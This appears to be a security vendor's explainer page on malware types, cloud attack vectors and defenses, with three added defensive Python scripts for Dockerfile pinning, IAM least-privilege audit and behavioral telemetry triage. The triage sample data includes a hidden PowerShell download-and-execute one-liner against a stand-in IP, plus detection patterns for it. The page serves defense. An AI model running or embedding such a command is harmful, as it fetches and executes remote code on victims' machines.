Malware, short for malicious software, refers to any software intentionally designed to cause damage, steal data, or gain unauthorized access to systems, networks, or users. It includes a broad range of threats such as viruses, worms, ransomware, spyware, Trojans, rootkits, and more. Malware is a key weapon in the arsenal of cybercriminals, state-sponsored actors, and hacktivists, and is frequently used in targeted attacks, large-scale campaigns, and supply chain compromises.
As cloud computing, SaaS, and containerized applications become more prevalent, malware is increasingly being adapted to exploit cloud-native environments in addition to traditional IT systems.
What is malware?
Malware is any piece of code or software that performs harmful actions on a system without the user’s consent. While some malware simply causes disruption or defacement, most modern malware is financially or strategically motivated—aiming to steal credentials, encrypt data for ransom, exfiltrate sensitive information, spy on users, or provide persistent access to attackers.
Malware can be delivered through various vectors including:
- Phishing emails and malicious attachments
- Infected websites or drive-by downloads
- Compromised software packages or container images
- Exploited vulnerabilities in applications or operating systems
- Infected USB drives or removable media
- Malicious insider uploads
Once executed, malware may run silently in the background, escalate privileges, disable defenses, communicate with command-and-control (C2) servers, or spread across networks or cloud environments.
Common types of malware
There are many types of malware, each with specific tactics and intended outcomes. Common variants include:
Ransomware: Encrypts files or entire systems and demands payment—usually in cryptocurrency—for the decryption key. Some variants also exfiltrate data for double extortion.
Trojans: Disguised as legitimate software or documents but install a backdoor or payload that enables remote control or data theft.
Worms: Self-replicating malware that spreads automatically across networks and devices, often without human interaction.
Viruses: Code that attaches to legitimate files and spreads when those files are executed. They can corrupt data, crash systems, or serve as a delivery mechanism for other payloads.
Spyware: Secretly monitors user activity, keystrokes, or browser history to gather data such as passwords, financial information, or intellectual property.
Adware: Displays unwanted ads or redirects users to malicious websites, sometimes also collecting personal data.
Rootkits: Modify low-level system components to hide malware or unauthorized processes, making them extremely difficult to detect and remove.
Fileless malware: Runs in memory rather than dropping an executable on disk, typically by abusing trusted tools that are already installed, such as PowerShell (a living-off-the-land tactic), so file-based antivirus has nothing to scan and only behavioral telemetry reveals it.
Modern malware often combines multiple tactics—for example, ransomware may include worm-like propagation or spyware may be bundled inside a Trojan.
Malware in cloud environments
While traditional malware targets endpoints and on-premises systems, attackers increasingly adapt their tactics to cloud-native and hybrid environments. Malware in the cloud can:
- Infect virtual machines through compromised images, exposed SSH ports, or outdated software
- Target misconfigured object storage buckets (e.g., AWS S3, Azure Blob) to plant malicious files for later delivery or to stage and exfiltrate stolen data
- Exploit vulnerable containers and base images in CI/CD pipelines or public registries
- Abuse cloud credentials to deploy or spread malware across cloud services
- Use serverless functions or automation scripts as delivery mechanisms
- Hide in persistent volumes or storage attached to Kubernetes clusters
Because cloud workloads often run without the endpoint controls used on premises, and because short-lived instances and containers can be torn down before anyone inspects them, malware in the cloud can be harder to detect and may persist unnoticed unless the environment is monitored continuously.
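Two of the cloud entry points listed above, compromised VM or container images and vulnerable base images pulled from public registries, are usually caught earliest at the Dockerfile. The following is an added example written for this page, not Orca's code or tooling: it parses the FROM lines of a constructed Dockerfile and reports base images that float on a mutable tag, are not pinned to a digest, or come from a registry outside an assumed trusted set. The Dockerfile text, the trusted-registry list and the digest are all constructed for illustration.

```python
"""Base-image pinning check for Dockerfiles.

Added example, not Orca's code: the Dockerfile content, the trusted
registry list and the digest below are constructed for illustration."""
import re

# FROM [--platform=...] <image> [AS <stage>]
FROM_RE = re.compile(
    r"^\s*FROM\s+(?:--platform=\S+\s+)?(?P<image>\S+)(?:\s+AS\s+(?P<stage>\S+))?\s*$",
    re.IGNORECASE,
)

# Assumed organisation policy: only these registries may supply base images.
TRUSTED_REGISTRIES = {"docker.io", "ghcr.io", "public.ecr.aws"}

# Constructed Dockerfile; the sha256 digest is a placeholder, not a real image.
SAMPLE_DOCKERFILE = """\
FROM python:3.12-slim AS build
RUN pip install --no-cache-dir -r requirements.txt
FROM ghcr.io/example-org/base@sha256:{d} AS runtime
COPY --from=build /app /app
FROM nginx
FROM registry.internal.example:5000/tools/scanner:1.4
FROM docker.io/someuser/helper:latest
FROM --platform=linux/amd64 build
""".format(d="0" * 64)


def parse_image_ref(ref):
    """Split an image reference into (registry, repository, tag, digest)."""
    digest = None
    if "@" in ref:
        ref, digest = ref.split("@", 1)
    registry = "docker.io"  # Docker Hub is the implicit default registry
    first, sep, rest = ref.partition("/")
    # A leading component with a dot or port (or 'localhost') names a registry.
    if sep and ("." in first or ":" in first or first == "localhost"):
        registry, ref = first, rest
    repo, tag = ref, None
    if ":" in ref.rsplit("/", 1)[-1]:
        repo, tag = ref.rsplit(":", 1)
    return registry, repo, tag, digest


def audit_dockerfile(text, trusted=TRUSTED_REGISTRIES):
    """Return (line_number, rule, image) for every risky FROM line."""
    findings = []
    stages = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        m = FROM_RE.match(line)
        if not m:
            continue
        image, stage = m.group("image"), m.group("stage")
        if stage:
            stages.add(stage.lower())
        if image.lower() in stages:
            continue  # refers to an earlier build stage, nothing is pulled
        registry, _repo, tag, digest = parse_image_ref(image)
        if registry not in trusted:
            findings.append((lineno, "untrusted_registry", image))
        if digest is None:
            # 'latest' or no tag can change under you at any time; a named tag
            # is better but still mutable, only a digest is immutable.
            rule = "floating_tag" if tag in (None, "latest") else "unpinned_tag"
            findings.append((lineno, rule, image))
    return findings


if __name__ == "__main__":
    for lineno, rule, image in audit_dockerfile(SAMPLE_DOCKERFILE):
        print(f"line {lineno}: {rule}: {image}")
```

Run it in a CI step before the image is built; a digest-pinned image from a trusted registry produces no finding, while the `nginx` and `:latest` lines are flagged as floating and the private registry on port 5000 is flagged as untrusted. Pinning alone does not make the base image safe, it only makes the image you scanned the image you deploy, so pair it with a vulnerability scan of that digest.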
How malware spreads
Malware propagation depends on both the environment and attacker objectives. Common propagation methods include:
- Phishing and social engineering to lure users into running malicious files or enabling macros
- Exploiting unpatched vulnerabilities in operating systems, browsers, or applications
- Exploiting default credentials or brute-forcing login pages
- Spreading laterally across networks, shared storage, or cloud accounts
- Hijacking legitimate infrastructure like supply chains or software updates
- Leveraging exposed APIs, misconfigured IAM roles, or shared secrets in cloud platforms
Sophisticated malware may also use encryption, obfuscation, and polymorphism to evade detection.
How to detect and prevent malware
Malware defense requires a combination of preventative controls and detection capabilities. Best practices include:
Keep systems and software updated: Regularly patch operating systems, applications, and container images to reduce exploitable vulnerabilities.
Use defense-in-depth: Layer traditional antivirus or EDR tools with newer cloud-native protections and workload monitoring.
Scan containers and images: Validate base images, third-party packages, and infrastructure as code templates before deployment.
Restrict permissions: Apply the principle of least privilege to users, applications, and services to limit malware’s potential impact.
Isolate workloads: Use network segmentation, namespaces, and runtime controls to prevent lateral movement.
Detect anomalies: Monitor for unusual behavior such as spikes in CPU, unauthorized script execution, outbound traffic to unknown domains, or file system changes.
Educate users: Train employees to recognize phishing attempts and avoid risky behaviors like downloading attachments from unknown sources.
Back up critical systems: Maintain encrypted, offline backups and test restores regularly, so that systems can actually be recovered after ransomware or data destruction rather than discovering a broken backup during the incident.
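The "restrict permissions" practice above, and the misconfigured IAM roles mentioned under how malware spreads, are easiest to reason about with a concrete policy in hand. The following is an added example written for this page, not Orca's code: it places a constructed over-broad AWS IAM policy next to a scoped one and runs a small least-privilege audit over both. The two policy documents, the bucket name and the list of escalation-capable actions are assumptions made for illustration, and the audit rules are deliberately minimal.

```python
"""Least-privilege audit of IAM policy documents.

Added example, not Orca's code: the two policies and the list of
escalation-capable actions below are constructed for illustration."""
import fnmatch

# Constructed: an over-broad policy. Malware running with these
# credentials can read every bucket, launch instances and pass roles.
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "s3:*", "Resource": "*"},
        {"Effect": "Allow", "Action": ["ec2:*", "iam:PassRole"], "Resource": "*"},
    ],
}

# Constructed: the same workload scoped to the one bucket prefix it
# actually reads, so stolen credentials expose only that prefix.
SCOPED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::app-uploads-prod/incoming/*"},
        {"Effect": "Allow", "Action": ["s3:ListBucket"],
         "Resource": "arn:aws:s3:::app-uploads-prod",
         "Condition": {"StringLike": {"s3:prefix": ["incoming/*"]}}},
    ],
}

# Actions that let a holder widen their own access or pivot; an Allow of
# any of them deserves review whatever the resource scope (assumed, partial list).
PRIV_ESC_ACTIONS = {
    "iam:PassRole", "iam:CreatePolicyVersion", "iam:AttachRolePolicy",
    "iam:AttachUserPolicy", "iam:PutRolePolicy", "iam:PutUserPolicy",
    "sts:AssumeRole", "lambda:UpdateFunctionCode",
}


def _as_list(value):
    # IAM accepts a single string or a list in Action/Resource.
    return value if isinstance(value, list) else [value]


def _allows(patterns, action):
    # IAM action matching is case-insensitive and '*' is a wildcard.
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)


def audit_policy(policy):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    for idx, st in enumerate(policy.get("Statement", [])):
        if st.get("Effect") != "Allow":
            continue
        actions = _as_list(st.get("Action", []))
        resources = _as_list(st.get("Resource", []))
        for a in actions:
            if "*" in a:
                findings.append({"statement": idx, "rule": "wildcard_action", "detail": a})
        if "*" in resources and "Condition" not in st:
            findings.append({"statement": idx, "rule": "unscoped_resource",
                             "detail": ", ".join(actions)})
        escalations = sorted(p for p in PRIV_ESC_ACTIONS if _allows(actions, p))
        if escalations:
            findings.append({"statement": idx, "rule": "privilege_escalation",
                             "detail": ", ".join(escalations)})
    return findings


def is_least_privilege(policy):
    return not audit_policy(policy)


if __name__ == "__main__":
    for name, pol in (("weak", WEAK_POLICY), ("scoped", SCOPED_POLICY)):
        print(name, "least privilege" if is_least_privilege(pol) else audit_policy(pol))
```

The weak policy is flagged five times (two wildcard actions, two unscoped resources and the `iam:PassRole` grant), the scoped one not at all. The check ignores `NotAction`, `NotResource` and permission boundaries, so treat it as a first pass, not a substitute for a real policy analyzer; its value here is showing what "least privilege" means in the concrete terms malware with stolen credentials would run into.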
Malware challenges in detection and response
Despite advances in security tooling, detecting and remediating malware remains challenging:
- Fileless malware and living-off-the-land tactics evade signature-based defenses
- Malware may reside in workloads that lack EDR or antivirus coverage
- Attackers often use legitimate credentials or automation tools to blend in
- In cloud environments, rapid infrastructure changes make it difficult to track persistence
- Traditional tools may not inspect object storage, containers, or serverless functions for malware
Security teams must adopt a threat-informed approach—correlating behavioral data, cloud context, and asset relationships to detect and stop malware effectively.
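The behavioral signals named under "detect anomalies" above (CPU spikes, unauthorized script execution, outbound traffic to unknown domains, file system changes) are exactly what remains once fileless and living-off-the-land tactics have taken file signatures off the table. The following is an added example written for this page, not Orca's code or detection logic: it runs four simple behavioral rules over a constructed batch of telemetry events, including a PowerShell `-EncodedCommand` launched from an Office process, which it decodes before matching. The event schema, the egress allowlist, the thresholds and every event are assumptions made for illustration.

```python
"""Behavioral triage of workload telemetry for malware indicators.

Added example, not Orca's code: the event schema, thresholds,
allowlist and every event below are constructed for illustration."""
import base64
import re
from collections import defaultdict

# PowerShell -EncodedCommand payloads are base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
SUSPICIOUS_PS = re.compile(
    r"IEX|Invoke-Expression|DownloadString|DownloadFile|FromBase64String", re.IGNORECASE)
IP_LITERAL = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Assumed egress allowlist for these workloads; anything else gets reviewed.
ALLOWLIST = {"api.github.com", "deb.debian.org"}


def ps_encode(script):
    """Encode a script the way 'powershell -enc' expects it (used to build sample data)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample telemetry: process starts, flow-log connections,
# CPU samples and file operations from several hypothetical hosts.
EVENTS = [
    {"type": "process", "host": "web-01", "parent": "systemd",
     "cmdline": "/usr/bin/python3 app.py"},
    {"type": "process", "host": "ws-07", "parent": "winword.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ps_encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")},
    {"type": "process", "host": "ws-07", "parent": "explorer.exe",
     "cmdline": "powershell.exe -Command Get-Date"},
    {"type": "netconn", "host": "ws-07", "dst_host": "198.51.100.7", "dst_port": 80},
    {"type": "netconn", "host": "web-01", "dst_host": "api.github.com", "dst_port": 443},
    {"type": "netconn", "host": "web-01", "dst_host": "cdn-x7q.example.net", "dst_port": 443},
    {"type": "cpu", "host": "db-02", "percent": 97},
    {"type": "cpu", "host": "db-02", "percent": 12},
] + [
    {"type": "file", "host": "fs-03", "op": "rename",
     "path": f"/srv/share/docs/report{i}.docx",
     "new_path": f"/srv/share/docs/report{i}.docx.locked"}
    for i in range(6)
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events, allowlist=ALLOWLIST, cpu_threshold=90, rename_threshold=5):
    """Run the four behavioral rules and return a list of findings."""
    findings = []
    renames = defaultdict(list)  # (host, new extension) -> renamed paths
    for ev in events:
        kind = ev["type"]
        if kind == "process":
            decoded = decode_encoded_command(ev["cmdline"])
            if decoded and SUSPICIOUS_PS.search(decoded):
                findings.append({"rule": "encoded_powershell", "host": ev["host"],
                                 "detail": f"parent={ev['parent']} script={decoded[:60]}"})
        elif kind == "netconn":
            dst = ev["dst_host"]
            if dst not in allowlist:
                why = "direct-to-IP" if IP_LITERAL.match(dst) else "unlisted domain"
                findings.append({"rule": "unknown_outbound", "host": ev["host"],
                                 "detail": f"{why} {dst}:{ev['dst_port']}"})
        elif kind == "cpu" and ev["percent"] >= cpu_threshold:
            findings.append({"rule": "cpu_spike", "host": ev["host"],
                             "detail": f"{ev['percent']}% (cryptominer?)"})
        elif kind == "file" and ev["op"] == "rename":
            ext = ev["new_path"].rsplit(".", 1)[-1]
            renames[(ev["host"], ext)].append(ev["new_path"])
    # Many files gaining the same new extension in one batch looks like encryption.
    for (host, ext), paths in renames.items():
        if len(paths) >= rename_threshold:
            findings.append({"rule": "mass_rename", "host": host,
                             "detail": f"{len(paths)} files renamed to .{ext}"})
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"{f['host']}: {f['rule']}: {f['detail']}")
```

On the sample batch this yields one encoded PowerShell finding (spawned by `winword.exe`, decoded to a download-and-execute one-liner), two unknown outbound connections, one CPU spike and one mass-rename cluster; the benign `Get-Date` invocation and the allowlisted GitHub connection are not flagged. The point is that none of these rules needs a file hash: each looks at what the workload did, which is the only evidence fileless malware leaves.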
How Orca Security helps
The Orca Cloud Security Platform delivers comprehensive malware detection and protection across AWS, Azure, Google Cloud, Oracle Cloud, Alibaba Cloud, and Kubernetes—without requiring agents.
Orca helps security teams:
- Detect, prioritize, and remediate malware in cloud workloads, such as storage buckets and virtual machines
- Leverage multiple detection techniques, including signature-based scanning, heuristic file analysis, dynamic scanning, genetic signature detection, and YARA rules
- Analyze malware risks holistically to identify critical attack paths and enhance Cloud Detection and Response (CDR)
- Ensure continuous multi-cloud compliance with regulations and industry standards that mandate malware detection
Orca gives organizations full-stack, context-rich visibility into malware risks—allowing them to act quickly and stop threats before they escalate.